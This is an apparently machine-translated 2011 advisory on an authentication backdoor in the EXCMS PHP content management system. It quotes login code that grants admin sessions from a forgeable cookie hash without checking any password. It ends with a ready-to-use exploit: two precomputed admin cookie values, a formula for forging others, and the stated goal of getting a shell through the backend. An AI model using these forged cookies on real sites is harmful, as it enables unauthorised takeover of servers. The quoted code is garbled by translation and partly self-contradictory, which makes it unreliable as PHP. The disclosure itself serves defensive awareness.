EXCMS 0-Day Vulnerability Analysis (author's backdoor)

Release date: 2011-01.18

Author: Mind

 

Affected Version: Unknown

Http://www.excms.cn/

 

Vulnerability Type: Cookie Spoofing

Vulnerability Description: This vulnerability uses COOKIES to directly go to the background and customize the Getshell page.

 

 

Background logon File

AdminModulesAuthIndex. php

 

 

<? If (defined ("EXCMS") // the following files in admin/index. php contain the running mode {} if (! Defined ("EXCMS_ADMIN") {exit ("Access Denied") ;}$ excms_action [title] = "Logon"; // title $ forward =$ _ GET [forward]; // jump to the next hop after login $ verifycode = $ EXCMS_CONFIG [login_verifycode]; // verification code... If ($ _ POST [loginType]! = 1 &&! Empty ($ _ COOKIE [EXCMSADMIN]) // click it! {$ Defaboxboxdisplay = "none"; $ BoxDisplay = ""; $ remeberInfo = explode ("&", $ _ COOKIE [EXCMSADMIN]); // do you see this? Magic tricks? $ RemeberAdmin = $ remeberInfo [0]; $ remeberPwd = $ remeberInfo [1]; // the account and password are obtained (using COOKIES ?) What will happen in the future is amazing! $ PwdForever = strtoupper (md5 ($ remeberAdmin. "love EXCMS forever"); // This is a Chinese character! Do you know what to say about conscience? Do you know what morality is? $ RemeberPwd = $ pwdForever? True: false; $ loginputdispay = $ remeberPwd? "None": ""; $ loginType = $ remeberPwd? 3: 2;} else {$ defaultBoxDisplay = ""; $ BoxDisplay = "none"; $ loginInputDispay = "none"; $ loginType = 1 ;} // The following is the output of the logon interface followed by CheckLogin. php verifies the classic line of the logon file to view the code! <? If (defined ("EXCMS") // index. php has {} if (! Defined ("EXCMS_ADMIN") {exit ("Access Denied") ;}$ excms_action [loadtpl] = true; $ adminname = trim ($ param [adminname]); $ password = trim ($ param [loginType] = 2? $ Param [password1]: $ param [password]); $ rememberPwd = $ param [loginType] = 2? $ Param [savePwd]: $ param [rememberPwd]; $ forward = $ param [forward]; $ login_fail = true; $ error = ""; // ignore the above $ param is POST-based if (empty ($ adminname) // check whether the account is empty {$ error = getlangbyname ("EMPTY_ADMINNAME ");} else if ($ param [loginType]! = 3 & empty ($ password) // check whether step 3rd and password are empty. {$ error = getlangbyname ("EMPTY_PASSWORD ");} else {if ($ param [loginType] = 3) {// The following content is not a vulnerability caused by mistake. It is impossible to use this programming technology to find any PHP expert to verify $ remeberInfo = explode ("&", $ _ COOKIE [EXCMSADMIN]); $ remeberAdmin = $ remeberInfo [0]; $ remeberPwd = $ remeberInfo [1]; // obtain the account and password from COOKIES! $ PwdForever = strtoupper (md5 ($ adminname. "love EXCMS forever"); if ($ remeberPwd = $ pwdForever) // The account encryption process in COOKIES is simpler than that in ESPCMS ~~ {Include_once (LIB_PATH. "system/Admin. class. php "); $ admin_obj = new Admin (); $ admin = $ admin_obj-> getByAdminname ($ adminname); // tragedy! Only the Administrator account is verified and no password is verified !!! If ($ admin) {$ admin [acl] = $ admin_obj-> getAdminACL ($ admin [adminid]); $ _ SESSION [admininfo] = $ admin; // The administrator privilege is obtained !!!!!!!!! + $ _ SESSION [admininfo] [logintimes]; $ admin_obj-> updateLastLogin ($ admin [adminid]); include_once (LIB_PATH. "auth/Auth. class. php "); $ auth = new Auth (); $ auth-> checkMenu (true); $ excms_action [loadtpl] = false; $ login_fail = false ;}}} else // skip without COKIES. The real login authentication status is shown below. Please note that there is a verification password! {If ($ EXCMS [config] [login_verifycode]) {$ param [verifycode] = trim ($ param [verifycode]); if ($ param [verifycode] = "") {$ error = getlangbyname ("EMPTY_VERIFYCODE");} else {include_once (LIB_PATH. "util/CheckCode. class. php "); $ checkcode = new CheckCode (); if (! $ Checkcode-> check ($ param [verifycode]) {$ error = getlangbyname ("VERIFYCODE_FAILED") ;}} if (empty ($ error) {include_once (LIB_PATH. "auth/Auth. class. php "); $ auth = new Auth (); $ loginMsg = $ auth-> Login ($ adminname, $ password); if ($ loginMsg [success]) {$ _ SESSION [admininfo] = $ loginMsg [admininfo]; ++ $ _ SESSION [admininfo] [logintimes]; $ auth-> checkMenu (true ); if ($ rememberPwd = 1) {$ PwdForever = strtoupper (md5 ($ adminname. "love EXCMS forever"); setcookie ("EXCMSADMIN", $ adminname. "&". $ pwdForever, time () + 2592000);} else if ($ param [loginType]! = 2 & $ param [rememberMe] = 1) {setcookie ("EXCMSADMIN", $ adminname, time () + 2592000);} $ login_fail = false; $ excms_action [loadtpl] = false;} else {$ error = getlangbyname ($ loginMsg [message]) ;}}} if (! $ Login_fail) {if (empty ($ forward) | strpos ($ forward, "index. php? M = Auth ") {header (" Location: index. php ", true); exit ();} header (" Location :". $ forward, true); exit () ;}$ errorCls = "f"; if ($ excms_action [loadtpl]) {if (! $ Error) {$ error = getlangbyname ("LOGIN_FAILED");} require (MODULES_PATH. "Auth/Index. php");}?> // Analysis complete

 

Finally, EXP is given.

EXCMSADMIN = admin % 26858A611C5651AC436D4450CE23A858D1;

EXCMSADMIN = administrator % 263E0331271F1133F9613BD49E7C4FB0CD;

The first is admin.

The first account is administrator. If these two other accounts are used, please structure them by yourself.

Structure Method setcookie ("EXCMSADMIN", md5 (account. "love EXCMS forever "));

 

Modify COOKIES and directly go to the background, and then customize the page to write data to the Internet.

 

 

The post-Cookie "vulnerability" does not mean to remember the management logon status, but to remember that the COOKIES used to manage logon are session id verification.

 

Therefore, this vulnerability 100% is a backdoor left by the author!